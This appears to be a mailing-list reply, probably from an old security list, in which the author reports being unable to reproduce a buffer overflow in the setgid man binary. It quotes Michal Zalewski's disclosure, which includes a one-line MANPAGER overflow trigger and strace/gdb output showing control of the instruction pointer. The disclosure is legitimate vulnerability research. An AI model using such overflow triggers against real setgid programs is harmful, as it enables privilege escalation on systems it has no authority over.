Hi,
I could not reproduce this on a SuSE 6.2 system running:
man, version 2.3.10, db 2.3.1, July 12th, 1995
([EMAIL PROTECTED])
My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
in every envrionment variable it uses without it flinching.
Michal Zalewski wrote:
>
> With most of Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always it's
> sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
> privledges, using buffer overflows in enviromental variables. For example,
> by specyfing MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:
>
> $ MANPAGER=`perl -e '{print "A"x4000}'` man ls
>
> [...]
>
> 1200 setuid(500) = 0
> 1200 setgid(15) = 0
> 1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or
>directory)
> 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such
>file or directory)1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No
>such file or directory)
> 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such
>file or directory)1200 close(-1) = -1 EBADF (Bad file
>descriptor)
> 1200 write(2, "Error executing formatting or display command.\nSystem command (cd
>/usr/man ; (echo
> 1200 --- SIGSEGV (Naruszenie ochrony pami�ci) ---
> 1200 +++ killed by SIGSEGV +++
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
